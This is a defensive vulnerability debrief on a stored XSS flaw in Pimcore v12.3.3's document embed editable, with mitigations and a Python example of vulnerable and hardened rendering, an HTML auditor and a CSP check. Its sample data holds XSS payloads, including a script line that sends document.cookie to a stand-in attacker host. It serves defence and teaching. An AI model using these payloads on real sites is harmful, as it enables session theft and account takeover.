PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-5362 pimcore CVE debrief

A stored cross-site scripting (XSS) vulnerability in Pimcore v12.3.3 allows authenticated attackers with document editing permissions to inject malicious HTML/JavaScript through the Document embed editable feature. The payload executes when published pages are rendered, potentially exposing session tokens or performing actions on behalf of victims. The CVSS 4.0 score of 4.8 (Medium) reflects a network attack vector, low attack complexity, the privileges required (an authenticated editor account), and the dependency on a victim viewing the published page. The vulnerability was published to NVD on 2026-04-27 and last modified on 2026-05-18. No known exploitation in ransomware campaigns has been documented.

Vendor
pimcore
Product
Unknown
CVSS
MEDIUM 4.8
CISA KEV
Not listed in stored evidence
Original CVE published
2026-04-27
Original CVE updated
2026-05-18
Advisory published
2026-04-27
Advisory updated
2026-05-18

Who should care

Organizations operating Pimcore v12.3.3 content management instances, particularly those with multi-user editorial workflows or externally facing published content. Security teams responsible for CMS hardening and web application firewall rule development.

Technical summary

The vulnerability exists in the Document embed editable component of Pimcore v12.3.3, where insufficient input sanitization allows authenticated users with edit permissions to persist arbitrary HTML and JavaScript. When the embedded content is rendered on published pages without proper output encoding, the injected script executes in the browser of every visitor, under the origin of the site. This is the stored XSS pattern: exploitation requires authenticated access, but once the payload is saved with the document it fires for each viewer of the published page until the content is removed, so the impact is persistent rather than limited to the editor's own session.

Defensive priority

medium

Recommended defensive actions

  • Review and restrict document editing permissions to minimize attack surface
  • Implement Content Security Policy (CSP) headers that disallow inline script (no 'unsafe-inline' in script-src) to limit the impact of injected markup
  • Audit published documents for unauthorized embed content, in particular script elements, on* event-handler attributes, and javascript: URLs
  • Apply vendor patches when available, prioritizing production CMS instances
  • Monitor for anomalous document modifications by authenticated users, such as embed changes outside normal editorial hours or by accounts that rarely edit
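As an added illustration (not Pimcore code and not taken from the advisory), the following Python models the vulnerable rendering pattern described in the technical summary next to a hardened version, and implements the audit and CSP checks from the list above. The embed values, the allowlisted embed hosts and all function names are constructed assumptions for the example.

```python
"""Stored XSS through an embed field: vulnerable vs. hardened rendering, plus
an audit of rendered markup and a CSP check. Constructed example, not Pimcore code."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample values standing in for what an editor could save into an
# embed editable. The first is benign; the rest are XSS payloads.
BENIGN_EMBED = "https://www.youtube.com/embed/example"
PAYLOADS = [
    '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    "javascript:alert(document.domain)",
    '" onload="alert(1)',
]

# Assumption for the example: hosts an embed is allowed to point at.
ALLOWED_EMBED_HOSTS = {"www.youtube.com", "player.vimeo.com"}


def render_embed_unsafe(value: str) -> str:
    """Vulnerable pattern: editor-controlled value concatenated into markup."""
    return f'<div class="embed"><iframe src="{value}"></iframe></div>'


def render_embed_safe(value: str) -> str:
    """Hardened pattern: validate the value as an http(s) URL on an allowlisted
    host, then HTML-encode it on output (defense in depth: a quote in the path
    of an allowlisted URL still cannot break out of the attribute)."""
    parsed = urlparse(value)
    if parsed.scheme not in ("http", "https") or parsed.netloc not in ALLOWED_EMBED_HOSTS:
        raise ValueError(f"embed URL rejected: {value!r}")
    return f'<div class="embed"><iframe src="{html.escape(value, quote=True)}"></iframe></div>'


class InlineScriptAuditor(HTMLParser):
    """Collects markup that executes script when rendered: <script> elements,
    on* event-handler attributes, and javascript: URLs in src/href/action."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script-element", tag))
        for name, val in attrs:
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}"))
            if name in ("src", "href", "action") and val and val.strip().lower().startswith("javascript:"):
                self.findings.append(("javascript-url", f"{tag}@{name}"))


def audit_markup(markup: str):
    """Return the list of (kind, location) findings for a rendered page fragment."""
    parser = InlineScriptAuditor()
    parser.feed(markup)
    parser.close()
    return parser.findings


def csp_blocks_inline_script(header: str) -> bool:
    """True if the effective script-src (falling back to default-src) contains
    neither 'unsafe-inline' nor an open source such as * or data:. Conservative:
    a policy carrying both a nonce and 'unsafe-inline' is still reported as weak."""
    directives = {}
    for part in header.split(";"):
        tokens = part.strip().split()
        if tokens:
            directives[tokens[0].lower()] = {t.lower().strip("'") for t in tokens[1:]}
    sources = directives.get("script-src", directives.get("default-src"))
    if sources is None:
        return False  # no restriction on script at all
    return not ({"unsafe-inline", "*", "data:"} & sources)


if __name__ == "__main__":
    for p in PAYLOADS:
        print("unsafe:", audit_markup(render_embed_unsafe(p)))
        try:
            render_embed_safe(p)
        except ValueError as e:
            print("safe  :", e)
    print("benign:", audit_markup(render_embed_safe(BENIGN_EMBED)))
    print("csp ok:", csp_blocks_inline_script("default-src 'self'; script-src 'self'"))
```

The auditor is deliberately simple: it walks rendered HTML rather than the stored editable value, because what matters is what reaches the visitor's browser after templating. Run it over the published pages of documents whose embed editables changed recently, and pair it with the CSP check against the live response headers; a page with findings and a policy that permits inline script is the case to treat as an incident rather than a hygiene issue.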

Evidence notes

CWE-79 (Improper Neutralization of Input During Web Page Generation) identified as primary weakness. Affected version confirmed as 12.3.3 via CPE criteria. Advisory source tagged as containing exploit information.

Official resources

Disclosed via NVD with third-party advisory from Fluid Attacks